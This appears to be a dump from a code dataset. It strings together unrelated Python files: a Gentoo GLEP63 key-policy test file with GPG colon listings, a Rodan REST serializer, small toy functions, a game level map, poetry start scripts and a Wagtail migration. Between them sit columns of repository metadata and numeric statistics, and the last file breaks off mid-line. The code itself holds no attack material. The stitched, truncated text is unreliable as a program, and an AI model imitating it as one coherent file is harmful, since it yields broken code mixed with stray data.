uid:r::::::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <nobody@gentoo.org>::::::::::0:
sub:-:4096:1:2D927DAC6A85C6BD:1533247212:1564783212:::::s::::::23:
fpr:::::::::F216FC6F6C4EC3AD4DE4A4AF2D927DAC6A85C6BD:
sub:-:4096:1:D1DE5B31DBAB4E09:1533247215:1564783215:::::e::::::23:
fpr:::::::::C40C2A33B028C24C6FA21BF0D1DE5B31DBAB4E09:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='2D927DAC6A85C6BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 12),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='D1DE5B31DBAB4E09',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 15),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 15),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 15),
expiration_date=None,
uid_hash='5D26637AF3E9C4C07D3971B0BFC9D8AB2C3F8CA3',
user_id='GLEP63 test key <nobody@example.com>',
),
UID(
validity=Validity.REVOKED,
creation_date=None,
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <nobody@gentoo.org>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyWarning(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyWarning(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-1-strict': [
KeyWarning(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyWarning(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
}
class NoGentooUIDTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'other/no-gentoo-uid.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247215::5D26637AF3E9C4C07D3971B0BFC9D8AB2C3F8CA3::GLEP63 test key <nobody@example.com>::::::::::0:
sub:-:4096:1:2D927DAC6A85C6BD:1533247212:1564783212:::::s::::::23:
fpr:::::::::F216FC6F6C4EC3AD4DE4A4AF2D927DAC6A85C6BD:
sub:-:4096:1:D1DE5B31DBAB4E09:1533247215:1564783215:::::e::::::23:
fpr:::::::::C40C2A33B028C24C6FA21BF0D1DE5B31DBAB4E09:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='2D927DAC6A85C6BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 12),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='D1DE5B31DBAB4E09',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 15),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 15),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 15),
expiration_date=None,
uid_hash='5D26637AF3E9C4C07D3971B0BFC9D8AB2C3F8CA3',
user_id='GLEP63 test key <nobody@example.com>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyWarning(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyWarning(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-1-strict': [
KeyWarning(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyWarning(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
}
class RevokedSubKeyOnlyTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'other/revoked-subkey-only.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247213::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <nobody@gentoo.org>::::::::::0:
sub:r:4096:1:2D927DAC6A85C6BD:1533247212:1564783212:::::s::::::23:
fpr:::::::::F216FC6F6C4EC3AD4DE4A4AF2D927DAC6A85C6BD:
sub:r:4096:1:D1DE5B31DBAB4E09:1533247215:1564783215:::::e::::::23:
fpr:::::::::C40C2A33B028C24C6FA21BF0D1DE5B31DBAB4E09:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cC',
curve='',
subkeys=[
Key(
validity=Validity.REVOKED,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='2D927DAC6A85C6BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 12),
key_caps='s',
curve='',
),
Key(
validity=Validity.REVOKED,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='D1DE5B31DBAB4E09',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 15),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 15),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 13),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <nobody@gentoo.org>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-1-strict': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
KeyIssue(
key=KEY,
machine_desc='subkey:none:e',
long_desc='',
),
],
}
class RevokedShortSubKeyTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'other/revoked-short-subkey.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247213::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <nobody@gentoo.org>::::::::::0:
sub:-:4096:1:2D927DAC6A85C6BD:1533247212:1564783212:::::s::::::23:
fpr:::::::::F216FC6F6C4EC3AD4DE4A4AF2D927DAC6A85C6BD:
sub:-:4096:1:D1DE5B31DBAB4E09:1533247215:1564783215:::::e::::::23:
fpr:::::::::C40C2A33B028C24C6FA21BF0D1DE5B31DBAB4E09:
sub:r:1024:1:B3486BCC2DC48389:1533247215:1564783215:::::s:::::::
fpr:::::::::DEFA19BB1BEC81CD0E8B2B63B3486BCC2DC48389:
sub:r:1024:1:31EF1F504A39CC46:1533247215:1564783215:::::e:::::::
fpr:::::::::4BDEA4604CAABF8C158B66F731EF1F504A39CC46:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='2D927DAC6A85C6BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 12),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='D1DE5B31DBAB4E09',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 15),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 15),
key_caps='e',
curve='',
),
Key(
validity=Validity.REVOKED,
key_length=1024,
key_algo=KeyAlgo.RSA,
keyid='B3486BCC2DC48389',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 15),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 15),
key_caps='s',
curve='',
),
Key(
validity=Validity.REVOKED,
key_length=1024,
key_algo=KeyAlgo.RSA,
keyid='31EF1F504A39CC46',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 15),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 15),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 13),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <nobody@gentoo.org>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [],
'glep63-1-rsa2048-ec25519': [],
'glep63-1-strict': [],
'glep63-2': [],
'glep63-2-draft-20180707': [],
'glep63-2.1': [],
}
| 31.751419
| 111
| 0.49344
| 2,487
| 27,973
| 5.420587
| 0.064335
| 0.050738
| 0.084563
| 0.017432
| 0.909576
| 0.904458
| 0.90112
| 0.895928
| 0.864624
| 0.848898
| 0
| 0.200465
| 0.369428
| 27,973
| 880
| 112
| 31.7875
| 0.563807
| 0.004254
| 0
| 0.902292
| 0
| 0
| 0.265063
| 0.188869
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003619
| 0
| 0.057901
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e593bcc49333c758c423ea8f9d839deae920f486
| 1,048
|
py
|
Python
|
rodan/serializers/output.py
|
carrieeex/Rodan
|
458e72990c2571fa727a0d026fb235faf30bffec
|
[
"MIT"
] | 31
|
2015-01-06T17:23:45.000Z
|
2022-03-30T02:46:16.000Z
|
rodan/serializers/output.py
|
carrieeex/Rodan
|
458e72990c2571fa727a0d026fb235faf30bffec
|
[
"MIT"
] | 258
|
2015-01-02T19:34:57.000Z
|
2022-01-19T16:34:21.000Z
|
rodan/serializers/output.py
|
carrieeex/Rodan
|
458e72990c2571fa727a0d026fb235faf30bffec
|
[
"MIT"
] | 8
|
2015-08-19T16:09:31.000Z
|
2021-10-03T23:46:46.000Z
|
from rest_framework import serializers
from rodan.models.output import Output
class OutputSerializer(serializers.HyperlinkedModelSerializer):
output_port_type = serializers.HyperlinkedRelatedField(
view_name="outputporttype-detail",
read_only=True,
lookup_field="uuid",
lookup_url_kwarg="pk",
)
class Meta:
model = Output
fields = (
"url",
"uuid",
"output_port_type_name",
"output_port_type",
"run_job",
"resource",
)
class OutputListSerializer(serializers.HyperlinkedModelSerializer):
output_port_type = serializers.HyperlinkedRelatedField(
view_name="outputporttype-detail",
read_only=True,
lookup_field="uuid",
lookup_url_kwarg="pk",
)
class Meta:
model = Output
fields = (
"url",
"uuid",
"output_port_type_name",
"output_port_type",
"run_job",
"resource",
)
| 24.372093
| 67
| 0.582061
| 91
| 1,048
| 6.406593
| 0.373626
| 0.102916
| 0.144082
| 0.161235
| 0.806175
| 0.806175
| 0.806175
| 0.806175
| 0.806175
| 0.806175
| 0
| 0
| 0.328244
| 1,048
| 42
| 68
| 24.952381
| 0.828125
| 0
| 0
| 0.777778
| 0
| 0
| 0.164122
| 0.080153
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.055556
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e5a51d76d6c9e5d1ec6b1407ba81e9783a686d56
| 70
|
py
|
Python
|
Python3-TestFramework/TestFramework__unittest/ExampleModule.py
|
anliven/Reading-Code-Learning-Python
|
a814cab207bbaad6b5c69b9feeb8bf2f459baf2b
|
[
"Apache-2.0"
] | null | null | null |
Python3-TestFramework/TestFramework__unittest/ExampleModule.py
|
anliven/Reading-Code-Learning-Python
|
a814cab207bbaad6b5c69b9feeb8bf2f459baf2b
|
[
"Apache-2.0"
] | null | null | null |
Python3-TestFramework/TestFramework__unittest/ExampleModule.py
|
anliven/Reading-Code-Learning-Python
|
a814cab207bbaad6b5c69b9feeb8bf2f459baf2b
|
[
"Apache-2.0"
] | null | null | null |
def e_sum(x, y):
return x + y
def e_sub(x, y):
return x - y
| 10
| 16
| 0.514286
| 16
| 70
| 2.125
| 0.4375
| 0.235294
| 0.470588
| 0.529412
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.342857
| 70
| 6
| 17
| 11.666667
| 0.73913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
e5c86228d9225334ddb4b762fd40f06044accf9c
| 171
|
py
|
Python
|
05/00/set.py
|
pylangstudy/201708
|
126b1af96a1d1f57522d5a1d435b58597bea2e57
|
[
"CC0-1.0"
] | null | null | null |
05/00/set.py
|
pylangstudy/201708
|
126b1af96a1d1f57522d5a1d435b58597bea2e57
|
[
"CC0-1.0"
] | 39
|
2017-07-31T22:54:01.000Z
|
2017-08-31T00:19:03.000Z
|
05/00/set.py
|
pylangstudy/201708
|
126b1af96a1d1f57522d5a1d435b58597bea2e57
|
[
"CC0-1.0"
] | null | null | null |
s = set(); print(s, type(s))
s = set([1,2,3]); print(s, type(s))
s = set([1,2,3,2,1]); print(s, type(s))
s = {}; print(s, type(s))#dict
s = {1,2,3,2,1}; print(s, type(s))
| 28.5
| 39
| 0.502924
| 42
| 171
| 2.047619
| 0.190476
| 0.348837
| 0.581395
| 0.639535
| 0.767442
| 0.755814
| 0.755814
| 0.755814
| 0.755814
| 0
| 0
| 0.089041
| 0.146199
| 171
| 5
| 40
| 34.2
| 0.5
| 0.023392
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
e5fa937ade8982496b09e9d46ad051cadf38692d
| 2,246
|
py
|
Python
|
map.py
|
kootee/QuantumGames2020
|
def5118ccf4d8cb94342e37278d366faa926c43a
|
[
"Apache-2.0"
] | 1
|
2020-04-24T12:03:57.000Z
|
2020-04-24T12:03:57.000Z
|
map.py
|
kootee/QuantumGames2020
|
def5118ccf4d8cb94342e37278d366faa926c43a
|
[
"Apache-2.0"
] | null | null | null |
map.py
|
kootee/QuantumGames2020
|
def5118ccf4d8cb94342e37278d366faa926c43a
|
[
"Apache-2.0"
] | null | null | null |
level = [
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 0, 0, 0, 0, 0, 2, 1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #0-2
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #3-5
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 0, 0, 0, 0, 0, 2, 1), #6-8
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #9-11
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #12-14
(1, 0, 0, 0, 0, 0, 2, 1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #15-17
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #18-20
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 0, 0, 0, 0, 0, 2, 1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #21-23
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #24-26
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 0, 0, 1, 0, 1, 0, 1), #27-29
(1, 1 ,0 ,1 ,1 ,0 ,0 ,1), (0, 0, 0, 0, 0, 0, 0, 1), (1, 1, 0, 1, 1, 0, 0, 1), #30-32
(0, 0, 0, 0, 0, 0, 0 ,1), (1, 0, 0, 0, 0, 0, 0, 1), (1, 0, 0, 0, 0, 0, 0, 1), #33-35
(1, 0, 0, 0, 0, 0, 0, 0), (1, 0, 0, 0, 0, 0, 0 ,0), (0, 0, 0, 0, 0, 0, 0, 0), #36-38
(1, 0, 0, 1, 1, 1, 0, 1), (1, 0, 0, 1, 1, 1 ,0 ,1), (1, 0, 0, 0, 1, 1, 1, 1), #39-41
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #42-44
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #45-47
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #48-50
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #51-53
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #54-56
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #57-59
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #60-62
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #63-65
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #66-68
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #69-71
]
| 83.185185
| 93
| 0.298308
| 625
| 2,246
| 1.072
| 0.08
| 1.316418
| 1.826866
| 2.280597
| 0.856716
| 0.856716
| 0.847761
| 0.847761
| 0.840299
| 0.829851
| 0
| 0.461485
| 0.358415
| 2,246
| 26
| 94
| 86.384615
| 0.00347
| 0.050312
| 0
| 0.653846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
f91adcd080a2da53fa25c028c84301a537fdfc42
| 185
|
py
|
Python
|
devtoapi/scripts/__init__.py
|
volt1c/devto-api
|
66a493f3c1ae6100a3fc203a5c441f2c04ad6e35
|
[
"MIT"
] | null | null | null |
devtoapi/scripts/__init__.py
|
volt1c/devto-api
|
66a493f3c1ae6100a3fc203a5c441f2c04ad6e35
|
[
"MIT"
] | null | null | null |
devtoapi/scripts/__init__.py
|
volt1c/devto-api
|
66a493f3c1ae6100a3fc203a5c441f2c04ad6e35
|
[
"MIT"
] | null | null | null |
import subprocess
def start_dev():
subprocess.run('poetry run uvicorn devtoapi:app --reload'.split())
def start():
subprocess.run('poetry run uvicorn devtoapi:app'.split())
| 18.5
| 70
| 0.713514
| 24
| 185
| 5.458333
| 0.5
| 0.122137
| 0.290076
| 0.335878
| 0.610687
| 0.610687
| 0.610687
| 0
| 0
| 0
| 0
| 0
| 0.145946
| 185
| 9
| 71
| 20.555556
| 0.829114
| 0
| 0
| 0
| 0
| 0
| 0.383784
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| true
| 0
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
9721e63434ec25cb5ed822b474ac1396a7a18305
| 21,982
|
py
|
Python
|
cfgov/v1/migrations/0048_remove_body_header_fields_from_main_contact_info.py
|
cyVR/aur
|
269dad2e659f7366e6eea037110d38ab41e3ad53
|
[
"CC0-1.0"
] | null | null | null |
cfgov/v1/migrations/0048_remove_body_header_fields_from_main_contact_info.py
|
cyVR/aur
|
269dad2e659f7366e6eea037110d38ab41e3ad53
|
[
"CC0-1.0"
] | null | null | null |
cfgov/v1/migrations/0048_remove_body_header_fields_from_main_contact_info.py
|
cyVR/aur
|
269dad2e659f7366e6eea037110d38ab41e3ad53
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import v1.models.snippets
import wagtail.wagtailcore.fields
import wagtail.wagtailcore.blocks
import wagtail.wagtailsnippets.blocks
import wagtail.wagtailimages.blocks
import v1.atomic_elements.organisms
class Migration(migrations.Migration):
dependencies = [
('v1', '0047_resource_snippet_lists'),
]
operations = [
migrations.RemoveField(
model_name='contact',
name='hash',
),
migrations.AlterField(
model_name='cfgovpage',
name='sidefoot',
field=wagtail.wagtailcore.fields.StreamField([(b'call_to_action', wagtail.wagtailcore.blocks.StructBlock([(b'slug_text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'paragraph_text', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'button', wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))]))])), (b'related_links', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'paragraph', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))])))])), (b'related_posts', wagtail.wagtailcore.blocks.StructBlock([(b'limit', wagtail.wagtailcore.blocks.CharBlock(default=b'3', label=b'Limit')), (b'show_heading', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'This toggles the heading and icon for the related types.', default=True, required=False, label=b'Show Heading and Icon?')), (b'header_title', wagtail.wagtailcore.blocks.CharBlock(default=b'Further reading', label=b'Slug Title')), (b'relate_posts', wagtail.wagtailcore.blocks.BooleanBlock(default=True, required=False, editable=False, label=b'Blog Posts')), (b'relate_newsroom', wagtail.wagtailcore.blocks.BooleanBlock(default=True, required=False, editable=False, label=b'Newsroom')), (b'relate_events', wagtail.wagtailcore.blocks.BooleanBlock(default=True, required=False, label=b'Events')), (b'specific_categories', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.ChoiceBlock(required=False, choices=[(b'Blog', ((b'At the CFPB', b'At the CFPB'), (b'Policy & Compliance', b'Policy & Compliance'), (b'Data, Research & Reports', b'Data, research & reports'), (b'Info for Consumers', b'Info for consumers'))), (b'Newsroom', ((b'Op-Ed', b'Op-Ed'), (b'Press Release', b'Press Release'), (b'Speech', b'Speech'), (b'Testimony', b'Testimony')))]), required=False))])), (b'related_metadata', wagtail.wagtailcore.blocks.StructBlock([(b'slug', wagtail.wagtailcore.blocks.CharBlock(max_length=100)), (b'content', wagtail.wagtailcore.blocks.StreamBlock([(b'text', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(max_length=100)), (b'blob', wagtail.wagtailcore.blocks.RichTextBlock())], icon=b'pilcrow')), (b'list', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(max_length=100)), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))])))], icon=b'list-ul')), (b'date', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(max_length=100)), (b'date', wagtail.wagtailcore.blocks.DateBlock(required=False))], icon=b'date')), (b'topics', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(default=b'Topics', max_length=100)), (b'show_topics', wagtail.wagtailcore.blocks.BooleanBlock(default=True, required=False))], icon=b'tag'))])), (b'half_width', wagtail.wagtailcore.blocks.BooleanBlock(default=False, required=False))])), (b'email_signup', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'gd_code', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'form_field', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'btn_text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'required', wagtail.wagtailcore.blocks.BooleanBlock(required=False)), (b'info', wagtail.wagtailcore.blocks.RichTextBlock(required=False, label=b'Disclaimer')), (b'label', wagtail.wagtailcore.blocks.CharBlock(required=True)), (b'type', wagtail.wagtailcore.blocks.ChoiceBlock(required=False, choices=[(b'text', b'Text'), (b'checkbox', b'Checkbox'), (b'email', b'Email'), (b'number', b'Number'), (b'url', b'URL'), (b'radio', 